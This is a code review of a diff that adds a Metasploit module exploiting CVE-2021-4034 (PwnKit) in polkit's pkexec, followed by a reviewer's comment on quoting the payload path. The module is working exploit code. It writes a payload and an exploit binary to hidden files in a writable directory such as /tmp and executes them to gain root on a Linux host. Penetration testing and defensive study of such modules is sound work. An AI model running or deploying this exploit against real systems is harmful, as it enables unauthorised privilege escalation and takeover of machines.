modules/exploits/linux/local/cve_2021_4034_pwnkit_lpe_pkexec.rb

```diff
@@ -0,0 +1,90 @@
+        info,
+        'Name' => 'Local Privilege Escalation in polkits pkexec',
+        'Description' => %q{
+          A local privilege escalation vulnerability was found on polkit's pkexec utility.
+          The pkexec application is a setuid tool designed to allow unprivileged the
+          current version of pkexec doesn't handle the calling parameters count correctly
+          and ends trying to execute environment variables as commands.
+
+          An attacker can leverage this by crafting environment variables
+          in such a way it'll induce pkexec to execute arbitrary code. When successfully
+          executed the attack can cause a local privilege escalation given unprivileged
+          users administrative rights on the target machine.
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Qualys Security', # Original vulnerability discovery
+          'Andris Raugulis', # Exploit writeup and PoC
+          'Dhiraj Mishra'    # Metasploit Module
+        ],
+        'DisclosureDate' => '2022-01-25',
+        'Platform' => [ 'linux' ],
+        'Arch' => [ ARCH_X86, ARCH_X64 ],
+        'SessionTypes' => [ 'shell', 'meterpreter' ],
+        'Targets' => [[ 'Auto', {} ]],
+        'Privileged' => true,
+        'References' => [
+          [ 'CVE', '2021-4034' ],
+          [ 'URL', 'https://www.qualys.com/2022/01/25/cve-2021-4034/pwnkit.txt' ],
+          [ 'URL', 'https://github.com/arthepsy/CVE-2021-4034' ] # PoC Reference
+        ],
+        'Notes' => {
+          'Reliability' => [ REPEATABLE_SESSION ],
+          'Stability' => [ CRASH_SAFE ],
+          'SideEffects' => [ ]
+        },
+        'DefaultTarget' => 0
+      )
+    )
+    register_advanced_options([
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+    ])
+  end
+
+  def exploit
+    if is_root? && !datastore['ForceExploit']
+      fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
+    end
+
+    unless writable? datastore['WritableDir']
+      fail_with Failure::BadConfig, "#{datastore['WritableDir']} is not writable"
+    end
+
+    payload_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
+    upload_and_chmodx(payload_file, generate_payload_exe)
+    register_file_for_cleanup(payload_file)
+
+    exploit_file = "#{datastore['WritableDir']}/.#{Rex::Text.rand_text_alpha_lower(6..12)}"
+    if live_compile?
+      vprint_status 'Live compiling exploit on system...'
+      upload_and_compile exploit_file, exploit_data('CVE-2021-4034', 'cve_2021_4034.c')
+    else
+      vprint_status 'Dropping pre-compiled exploit on system...'
+      upload_and_chmodx exploit_file, exploit_data('CVE-2021-4034', 'cve_2021_4034')
+    end
+    register_file_for_cleanup(exploit_file)
+
+    print_status("Executing exploit '#{exploit_file}'")
+    result = cmd_exec("echo #{payload_file} | #{exploit_file}")
```

Comment:
`payload_file` may contain spaces.

```suggestion
    result = cmd_exec("echo '#{payload_file}' | #{exploit_file}")
```

Also, should this be backgrounded? Meterpreter execution is blocking.